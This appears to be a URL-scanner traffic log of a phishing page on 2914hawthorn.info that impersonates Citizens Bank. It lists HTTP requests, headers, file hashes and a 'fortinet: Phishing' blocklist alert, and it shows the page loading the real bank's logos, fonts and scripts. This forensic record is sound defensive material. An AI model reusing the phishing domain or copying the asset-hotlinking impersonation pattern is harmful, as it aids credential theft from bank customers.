Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "4a56-5e885b034f92d"
last-modified: Tue, 27 Sep 2022 19:42:38 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=819
x-olb-req-received: t=1664242473021567
content-length: 3118
cache-control: max-age=21062
expires: Sat, 01 Oct 2022 03:38:55 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (17412)
Size:   3118
Md5:    ac9a70a6f100c02749dfadb709b6eadf
Sha1:   69906e55ace36c217a52d428029a3c71dc16a7e4
Sha256: 466e6cf44306264c98e5642f77be87292e03e578ce78b17c0b39521460b1d37a
                                        
                                            GET /efs/hhf/img/CTZ_Green-01.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "149d-5e848db420aa2"
accept-ranges: bytes
content-length: 5277
x-olb-req-received: t=1664242473041815
x-olb-req-duration: D=105
access-control-allow-origin: *
cache-control: max-age=272936
expires: Tue, 04 Oct 2022 01:36:49 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 406 x 50, 8-bit/color RGBA, non-interlaced\012- data
Size:   5277
Md5:    beb4d1c9f430bb08a4ed54df069e8f0c
Sha1:   39950ddd690d1cbe2d08610da5c11c854450523f
Sha256: bf99a3203217c802888087df8a2c84b92e087829e7e24d38581a57cee763923b
                                        
                                            GET /efs/hhf/img/footer-follow-facebook.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "18b-5e848db420e8a"
accept-ranges: bytes
content-length: 395
x-olb-req-received: t=1664242473020178
x-olb-req-duration: D=100
access-control-allow-origin: *
cache-control: max-age=272792
expires: Tue, 04 Oct 2022 01:34:25 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=3
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 28 x 21, 8-bit/color RGB, non-interlaced\012- data
Size:   395
Md5:    25dbaaa7fa1bf41ca6614f1d2cf699f5
Sha1:   56a9e2459a275ef7178ff8c90c2b277265f64fb0
Sha256: eb175662762ef5f2c9011cc1c4f9d09361c50a366fad8a544bda1c439b99d3a0
                                        
                                            GET /efs/hhf/img/footer-follow-twitter.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "cdf-5e848db420e8a"
accept-ranges: bytes
content-length: 3295
x-olb-req-received: t=1664242473019524
x-olb-req-duration: D=120
access-control-allow-origin: *
cache-control: max-age=272702
expires: Tue, 04 Oct 2022 01:32:55 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=4
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 25 x 21, 8-bit/color RGBA, non-interlaced\012- data
Size:   3295
Md5:    ab8d8dc7ea3d7b572b2dc47f2aebe5ae
Sha1:   900c9f837d9a015e6609b14eed6d99c384ec5441
Sha256: 9b4ffac9ea755d2aaff724fa471d90fd63ae5648e18f60a67db0a5c3bffd84e5
                                        
                                            GET /efs/hhf/img/footer-follow-linkedin.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "ca7-5e848db420e8a"
accept-ranges: bytes
content-length: 3239
x-olb-req-received: t=1664242473775530
x-olb-req-duration: D=143
access-control-allow-origin: *
cache-control: max-age=272719
expires: Tue, 04 Oct 2022 01:33:12 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=3
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 25 x 21, 8-bit/color RGBA, non-interlaced\012- data
Size:   3239
Md5:    b187d1cd61b1912b22ebfb4efce30bad
Sha1:   b502a6ed3e50ffe6da8d8d5114fd404650d38ea7
Sha256: fe3ddc37707c93f338a1f6359dfa03019e096df14454808aaccbb7538aa3c67b
                                        
                                            GET /efs/hhf/img/footer-follow-youtube.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "cce-5e848db420e8a"
accept-ranges: bytes
content-length: 3278
x-olb-req-received: t=1664242473773232
x-olb-req-duration: D=131
access-control-allow-origin: *
cache-control: max-age=272774
expires: Tue, 04 Oct 2022 01:34:07 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 25 x 21, 8-bit/color RGBA, non-interlaced\012- data
Size:   3278
Md5:    09c8c4f0f417a049b8ab6acdd2581717
Sha1:   2c9dbf84a80167a9c7b41e5955969dd4d1d75c6f
Sha256: 9af5181113e5d0eacfc3d9c0b3ad627dc3ad50708755fbe45ab18e0cad4f3b36
                                        
                                            GET /efs/hhf/img/elh.gif HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/gif
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:58:56 GMT
etag: "599-5e849015def31"
accept-ranges: bytes
content-length: 1433
x-olb-req-received: t=1664242472993815
x-olb-req-duration: D=133
access-control-allow-origin: *
cache-control: max-age=272774
expires: Tue, 04 Oct 2022 01:34:07 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=3
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 31 x 24\012- data
Size:   1433
Md5:    f79e78d673f51194d9b9021cbc72b5b3
Sha1:   79a917fad527cef8d96af24d142653f2f49109b3
Sha256: 56c43c6f5c8209acd47f355810bca2f9b0fc86c4bbdf1361d60fb2d2e2e66f8c
                                        
                                            GET /efs/hhf/img/fdicFooter.gif HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/gif
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "8c5-5e848db420e8a"
accept-ranges: bytes
content-length: 2245
x-olb-req-received: t=1664242473127888
x-olb-req-duration: D=119
access-control-allow-origin: *
cache-control: max-age=272784
expires: Tue, 04 Oct 2022 01:34:17 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 56 x 24\012- data
Size:   2245
Md5:    a0742f4f717eac3a1e61f53cbbec74f2
Sha1:   f85639ee91bccd2bddaf043b80c892ae6b700d49
Sha256: dddb031e5144ce20d909dbf4829d637738efa477bf5ab4eab67b1990ef0efb2d
                                        
                                            GET /efs/efs/grafx/icon-secure.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/flows.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
etag: "124-5e6a235cbd9f7"
accept-ranges: bytes
content-length: 292
x-olb-req-received: t=1664242473456297
x-olb-req-duration: D=109
access-control-allow-origin: *
cache-control: max-age=272903
expires: Tue, 04 Oct 2022 01:36:16 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 16 x 20, 8-bit/color RGBA, non-interlaced\012- data
Size:   292
Md5:    18ffa7c3d8f40b5da7df780d91930e20
Sha1:   524ca8ffaadbd033fd0504fe580d47315690afa1
Sha256: c8d87d770112e188f7b1482e9a416ffc441a9a6e08e2fc38a886fa2986efdb46
                                        
                                            GET /efs/efs/grafx/flows-tooltip.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/flows.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
etag: "16c-5e6a235cbab17"
accept-ranges: bytes
content-length: 364
x-olb-req-received: t=1664242473366493
x-olb-req-duration: D=103
access-control-allow-origin: *
cache-control: max-age=272798
expires: Tue, 04 Oct 2022 01:34:31 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=4
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced\012- data
Size:   364
Md5:    35a7359b239ddca8639017dfc4b71b4a
Sha1:   dfdd659f24502fbe7dd79c9564e1e528233fdcad
Sha256: dfc042f7ff75f3c2f916bcfbff48c82834bab07b698a2c564906ca073f8286b2
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: X/te2qx3E+UwqDyv2tgCpQ==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         52.39.175.179
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 1dLQnzJZzoU+bP5VMiokoBNyq/c=

                                        
                                            GET /assets/CB_media/images/feedback.png HTTP/1.1 
Host: www.citizensbank.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.12.116
HTTP/2 200 OK
content-type: image/png
                                        
content-length: 824
last-modified: Wed, 22 Jan 2020 18:38:44 GMT
accept-ranges: bytes
etag: "052b72c53d1d51:0"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET, ARR/3.0
cache-control: max-age=600
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
x-robots-tag: none
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced\012- data
Size:   824
Md5:    561da56e59bf569d0f41d6bb9713ce2f
Sha1:   20bee990614a20ae69d2cd21fc9f0688f9fc02e1
Sha256: 713f1268435943170faadadc547d8c68bb00822783e5e0c2d1129972a784f949
                                        
                                            GET /efs/hhf/img/equal-housing.gif HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3
                                        
                                            GET /efs/hhf/js/citizensHeaderFooter-citizensns44745.js HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /efs/efs/grafx/arrow-button-white.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/flows.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
etag: "3f9-5e6a235ca4d07"
accept-ranges: bytes
content-length: 1017
x-olb-req-received: t=1664242473116125
x-olb-req-duration: D=98
access-control-allow-origin: *
cache-control: max-age=272805
expires: Tue, 04 Oct 2022 01:34:38 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=4
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 18 x 12, 8-bit/color RGBA, non-interlaced\012- data
Size:   1017
Md5:    e7b1dd2b4db648b74fc5b873e7196a87
Sha1:   2f053c0827091b3929ea889dd2dc5c923dcb450a
Sha256: ff327ec2a6dbd3fc76ceecf59e472d5d2f43c94dce851ced740abe5f75bb832e
                                        
                                            GET /us/wu/356861/onsite/generic1627665419003.js HTTP/1.1 
Host: nebula-cdn.kampyle.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.85.175
HTTP/2 200 OK
content-type: application/javascript
                                        
x-amz-id-2: 7JC+R1qtk/xWAekq6EJ/iOYnAKJVp0sKRR1Ywjuz3vmZwzXBAhzpM+8LLTyEIkPnxHqxm/IoVBY=
x-amz-request-id: A9WCT9EJKQ3JVC1B
last-modified: Fri, 30 Jul 2021 17:17:00 GMT
etag: "3e0f51a7fc9d1b87f0f8f84c58f5cff6"
x-amz-version-id: xzfZ8wCDhw5e8izCl9zfknZaOkwG9yp.
server: AmazonS3
access-control-allow-origin: *
cache-control: max-age=2592000
content-encoding: gzip
accept-ranges: bytes
date: Fri, 30 Sep 2022 21:47:53 GMT
via: 1.1 varnish
age: 60429
x-served-by: cache-bma1625-BMA
x-cache: HIT
x-cache-hits: 1
x-timer: S1664574474.698394,VS0,VE3
vary: Accept-Encoding
strict-transport-security: max-age=31557600
content-length: 89384
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (54051)
Size:   89384
Md5:    1ebc9dae5a99e14046f01ab634b3d66b
Sha1:   749a1f8f96d3fb3dbdf5ed2e5abc1d90c766e1d7
Sha256: 9e10b77f6b34faa32825868a8ef93d29b8dfb0d3a11ed6bf0a97ce02e8f7ce2d
                                        
                                            GET /efs/efs/grafx/arrow-down-blue.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/main.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
etag: "41e-5e6a235ca4d07"
accept-ranges: bytes
content-length: 1054
x-olb-req-received: t=1664242492934241
x-olb-req-duration: D=113
access-control-allow-origin: *
cache-control: max-age=272829
expires: Tue, 04 Oct 2022 01:35:02 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=15
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 28 x 11, 8-bit/color RGBA, non-interlaced\012- data
Size:   1054
Md5:    dc25c0429ceba4038c36551d05760dd7
Sha1:   a79832f9ae49997cd90701d48a02bd06bf29a7d0
Sha256: 56a8532b2a60ca2ae39c213f7e1e65e47834af927e6365444457f22ed12ed79c
                                        
                                            GET /efs/efs/grafx/arrow-right-orange.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/main.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
etag: "a5-5e6a235ca4d07"
accept-ranges: bytes
content-length: 165
x-olb-req-received: t=1664242473534137
x-olb-req-duration: D=103
access-control-allow-origin: *
cache-control: max-age=272786
expires: Tue, 04 Oct 2022 01:34:19 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=13
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 7 x 9, 8-bit/color RGBA, non-interlaced\012- data
Size:   165
Md5:    1792e4aa4d2d86dec430ef9a60362a35
Sha1:   90b9e9c14f636362e9558d14fefe15782f75d256
Sha256: bbb90a8f240e6dbbda1d3da534f8848f256e623ed470d045e1d86a465e424d69
                                        
                                            GET /efs/efs/jsp-ns/inc/css/font/citizen_roman.woff HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
                                        
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "7ce0-5e885b034bab2"
accept-ranges: bytes
content-length: 31968
x-olb-req-received: t=1664242473246819
x-olb-req-duration: D=161
access-control-allow-origin: *
cache-control: max-age=272806
expires: Tue, 04 Oct 2022 01:34:39 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format, TrueType, length 31968, version 1.0\012- data
Size:   31968
Md5:    d496c6122c776cae7c2a783bfcd7a3a1
Sha1:   fbdbec90d23bd77f471be50a3c6711e535ac72bc
Sha256: c8b1f6c22756521c86a5b0053b8565b49436f7fa19d1bb7cdf00a7808df28d42
                                        
                                            GET /efs/efs/jsp-ns/inc/css/font/citizen_book.woff HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
                                        
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "7c78-5e885b034b2e2"
accept-ranges: bytes
content-length: 31864
x-olb-req-received: t=1664242472959033
x-olb-req-duration: D=126
access-control-allow-origin: *
cache-control: max-age=272921
expires: Tue, 04 Oct 2022 01:36:34 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format, TrueType, length 31864, version 1.0\012- data
Size:   31864
Md5:    0dd22599312493e4bb7b8662f71dddcc
Sha1:   29f5fd587566f80d886dc0109f53ecf47eb5bbf5
Sha256: 2a0a7ee3ea564db1e157dd2202c20b8092228fea9091f5cd1e83551e170ec277
                                        
                                            GET /efs/efs/jsp-ns/inc/css/font/citizen_extrabold.woff HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
                                        
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "6ccc-5e885b034b6ca"
accept-ranges: bytes
content-length: 27852
x-olb-req-received: t=1664242473491853
x-olb-req-duration: D=151
access-control-allow-origin: *
cache-control: max-age=272783
expires: Tue, 04 Oct 2022 01:34:16 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format, TrueType, length 27852, version 1.0\012- data
Size:   27852
Md5:    76f4964f6d001aa6967fb570438d80cc
Sha1:   5259516d0615338a701e5a19a37d6bc45c6bcedc
Sha256: 0e9485cdb6a684713287cb41c6e6c3e26d12280f17349f98402456ff86ec9759
                                        
                                            GET /bootstrap/4.1.0/js/bootstrap.min.js HTTP/1.1 
Host: stackpath.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         104.18.10.207
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 30 Sep 2022 21:47:53 GMT
vary: Accept-Encoding
